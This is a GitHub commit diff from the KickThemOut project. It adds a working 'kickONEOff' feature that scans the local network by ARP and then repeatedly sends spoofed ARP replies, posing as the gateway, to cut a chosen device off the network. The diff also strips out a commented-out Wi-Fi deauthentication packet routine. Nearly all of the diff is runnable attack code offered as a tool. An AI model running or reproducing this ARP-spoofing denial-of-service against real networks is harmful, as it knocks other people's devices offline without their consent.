kickONEOff working + fixes

This commit is contained in:
xdavidhu 2016-12-30 22:17:24 +01:00 committed by GitHub
parent af0429d7a6
commit 6fe8318eb4
3 changed files with 125 additions and 71 deletions

View File

@ -9,6 +9,11 @@ See License at nikolaskama.me (https://nikolaskama.me/kickthemoutproject)
import time, os, sys, logging import time, os, sys, logging
from time import sleep from time import sleep
from scapy.all import *
import math
import scan
import spoof
BLUE, RED, WHITE, YELLOW, MAGENTA, GREEN, END = '\33[94m', '\033[91m', '\33[97m', '\33[93m', '\033[1;35m', '\033[1;32m', '\033[0m' BLUE, RED, WHITE, YELLOW, MAGENTA, GREEN, END = '\33[94m', '\033[91m', '\33[97m', '\33[93m', '\033[1;35m', '\033[1;32m', '\033[0m'
@ -36,7 +41,52 @@ def optionBanner():
print('\n\t{0}[{1}E{2}]{3} Exit KickThemOut\n').format(YELLOW, RED, YELLOW, WHITE) print('\n\t{0}[{1}E{2}]{3} Exit KickThemOut\n').format(YELLOW, RED, YELLOW, WHITE)
def kickoneoff(): def kickoneoff():
print('kickoneoff') os.system("clear||cls")
global defaultInterface
global defaultInterfaceMac
global defaultGatewayIP
global defaultGatewayMac
global hostsList
global onlineIPs
print ""
print ("{0}kickONEOff{1} selected...{2}").format(RED, GREEN, END)
print ""
scanNetwork()
print "Online IPs: "
for ip in onlineIPs:
print (" {0}" + ip + "{1}").format(RED, END)
print ""
one_target_ip = raw_input("IP of the target: ")
one_target_mac = ""
for host in hostsList:
if host[0] == one_target_ip:
one_target_mac = host[1]
if one_target_mac == "":
print ""
print("IP address is not up. Please try again.")
return
print ""
print("{0}Target mac => '{1}" + one_target_mac + "{2}'{3}").format(GREEN, RED, GREEN, END)
print ""
print("{0}Spoofing started... {1}(press CTRL + C to stop)").format(GREEN, END)
print ""
try:
while True:
spoof.sendPacket(defaultInterfaceMac, defaultGatewayIP, one_target_ip, one_target_mac)
time.sleep(15)
except KeyboardInterrupt:
print ""
print("{0}Re-arping{1} target...{2}").format(RED, GREEN, END)
rearp = 1
while rearp != 10:
spoof.sendPacket(defaultGatewayMac, defaultGatewayIP, one_target_ip, one_target_mac)
rearp = rearp + 1
time.sleep(0.5)
print ""
print("{0}Done.{1}").format(GREEN, END)
def kicksomeoff(): def kicksomeoff():
print('kicksomeoff') print('kicksomeoff')
@ -44,71 +94,77 @@ def kicksomeoff():
def kickalloff(): def kickalloff():
print('kickalloff') print('kickalloff')
""" def scanNetwork():
def deauth_attack(iface, bssid): global hostsList
hostsList = scan.scanNetwork()
client = 'FF:FF:FF:FF:FF:FF' def getDefaultInterface():
def long2net(arg):
if (arg <= 0 or arg >= 0xFFFFFFFF):
raise ValueError("illegal netmask value", hex(arg))
return 32 - int(round(math.log(0xFFFFFFFF - arg, 2)))
conf.iface = iface def to_CIDR_notation(bytes_network, bytes_netmask):
conf.verb = 0 network = scapy.utils.ltoa(bytes_network)
packet = RadioTap()/Dot11(type=0,subtype=12,addr1=client, netmask = long2net(bytes_netmask)
addr2=bssid,addr3=bssid)/Dot11Deauth(reason=7) net = "%s/%s" % (network, netmask)
if netmask < 16:
return None
print('\nChoose option from menu:\n') return net
print('\t{0}[{1}1{2}]{3} Kick Once').format(YELLOW, RED, YELLOW, WHITE)
sleep(0.2)
print('\t{0}[{1}2{2}]{3} Keep Kicking').format(YELLOW, RED, YELLOW, WHITE)
sleep(0.2)
choice = None for network, netmask, _, interface, address in scapy.config.conf.route.routes:
while choice == None:
header = ('\n{0}kickthemout{1}> '.format(BLUE, WHITE)) # skip loopback network and default gw
choice = raw_input(header) if network == 0 or interface == 'lo' or address == '127.0.0.1' or address == '0.0.0.0':
if choice == '1': continue
pcounter_header = ('{0}kickthemout{1}> numofpackets: '.format(BLUE, WHITE))
pcounter = raw_input(pcounter_header) if netmask <= 0 or netmask == 0xFFFFFFFF:
print(pcounter) # {TESTING} continue
packets_sent = 0
for i in range(int(pcounter)): net = to_CIDR_notation(network, netmask)
sendp(packet)
packets_sent += 1 if interface != scapy.config.conf.iface:
print 'Deauth sent via: ' + iface + ' to BSSID: ' + bssid + '.\nPackets sent: ' + str(packets_sent) continue
sleep(2)
elif choice == '2': if net:
time_header = ('{0}kickthemout{1}> keepkickingfor(mins): '.format(BLUE, WHITE)) return interface
attack_time = float(raw_input(time_header))
start = time.time() def getGatewayIP():
packets_sent = 0 getGateway_p = sr1(IP(dst="google.com", ttl=0) / ICMP() / "XXXXXXXXXXX", verbose=False)
while (time.time() - start) != attack_time: return getGateway_p.src
sendp(packet)
packets_sent += 1
print 'Deauth sent via: ' + iface + ' to BSSID: ' + bssid + '.\nPackets sent: ' + str(packets_sent)
sleep(2)
else:
choice = None
print('*INVALID OPTION*') # {TESTING}
"""
def main(): def main():
heading() heading()
global defaultInterface
global defaultInterfaceMac
global defaultGatewayIP
global defaultGatewayMac
global hostsList
global onlineIPs
defaultInterface = getDefaultInterface()
defaultGatewayIP = getGatewayIP()
defaultInterfaceMac = get_if_hwaddr(defaultInterface)
scanNetwork()
onlineIPs = []
for host in hostsList:
onlineIPs.append(host[0])
if host[0] == defaultGatewayIP:
defaultGatewayMac = host[1]
print("\n{0}Using interface '{1}"+defaultInterface+"{2}' with mac address '{3}"+defaultInterfaceMac+"{4}'.\nGateway IP: '{5}"
+ defaultGatewayIP + "{6}'. {7}" + str(len(hostsList)) + "{8} hosts are up.{9}").format(GREEN, RED, GREEN, RED, GREEN, RED, GREEN, RED, GREEN, END)
try: try:
# CHECK FOR WIRELESS CARD
iface_header = ('\n{0}kickthemout{1}> interface: '.format(BLUE, WHITE))
iface = raw_input(iface_header)
# SCAN (AIRODUMP-NG) & PARSE (BSSIDs)
# ...
bssid_header = ('{0}kickthemout{1}> bssid: '.format(BLUE, WHITE))
bssid = raw_input(bssid_header) # {TESTING}
while True: while True:
optionBanner() optionBanner()
header = ('{0}kickthemout{1}> '.format(BLUE, WHITE)) header = ('{0}kickthemout{1}> {2}'.format(BLUE, WHITE, END))
choice = raw_input(header) choice = raw_input(header)
if choice.upper() == 'E' or choice.upper() == 'EXIT': if choice.upper() == 'E' or choice.upper() == 'EXIT':
@ -131,7 +187,7 @@ def main():
except KeyboardInterrupt: except KeyboardInterrupt:
print('\nThanks for dropping by.' print('\nThanks for dropping by.'
'\nCatch ya later!') '\nCatch ya later!{0}').format(END)
if __name__ == '__main__': if __name__ == '__main__':

30
scan.py
View File

@ -1,4 +1,4 @@
#kickthemout/scan.py by @xdavidhu #kickthemout/scan.py by @xdavidhu, and also by Benedikt Waldvogel (https://github.com/bwaldvogel/neighbourhood)
def scanNetwork(): def scanNetwork():
import scapy.config import scapy.config
@ -27,7 +27,7 @@ def scanNetwork():
def scan_and_print_neighbors(net, interface, timeout=1): def scan_and_print_neighbors(net, interface, timeout=1):
hostsList = [] hostsList = []
try: try:
ans, unans = scapy.layers.l2.arping(net, iface=interface, timeout=timeout, verbose=True) ans, unans = scapy.layers.l2.arping(net, iface=interface, timeout=timeout, verbose=False)
for s, r in ans.res: for s, r in ans.res:
mac = r.sprintf("%Ether.src%") mac = r.sprintf("%Ether.src%")
ip = r.sprintf("%ARP.psrc%") ip = r.sprintf("%ARP.psrc%")
@ -45,22 +45,20 @@ def scanNetwork():
raise raise
return hostsList return hostsList
for network, netmask, _, interface, address in scapy.config.conf.route.routes:
if __name__ == "__main__": # skip loopback network and default gw
for network, netmask, _, interface, address in scapy.config.conf.route.routes: if network == 0 or interface == 'lo' or address == '127.0.0.1' or address == '0.0.0.0':
continue
# skip loopback network and default gw if netmask <= 0 or netmask == 0xFFFFFFFF:
if network == 0 or interface == 'lo' or address == '127.0.0.1' or address == '0.0.0.0': continue
continue
if netmask <= 0 or netmask == 0xFFFFFFFF: net = to_CIDR_notation(network, netmask)
continue
net = to_CIDR_notation(network, netmask) if interface != scapy.config.conf.iface:
# see http://trac.secdev.org/scapy/ticket/537
continue
if interface != scapy.config.conf.iface: if net:
# see http://trac.secdev.org/scapy/ticket/537 return scan_and_print_neighbors(net, interface)
continue
if net:
return scan_and_print_neighbors(net, interface)

View File

@ -1,6 +1,6 @@
#kickthemout/scan.py by @xdavidhu #kickthemout/scan.py by @xdavidhu
def sendPacket(my_mac, interface, my_ip, target_ip, target_mac): def sendPacket(my_mac, gateway_ip, target_ip, target_mac):
import sys import sys
from scapy.all import ( from scapy.all import (
@ -15,7 +15,7 @@ def sendPacket(my_mac, interface, my_ip, target_ip, target_mac):
ether.src = my_mac ether.src = my_mac
arp = ARP() arp = ARP()
arp.psrc = my_ip arp.psrc = gateway_ip
arp.hwsrc = my_mac arp.hwsrc = my_mac
arp = arp arp = arp
@ -28,4 +28,4 @@ def sendPacket(my_mac, interface, my_ip, target_ip, target_mac):
arp.op = 2 arp.op = 2
packet = ether/arp packet = ether/arp
sendp(x=packet) sendp(x=packet, verbose=False)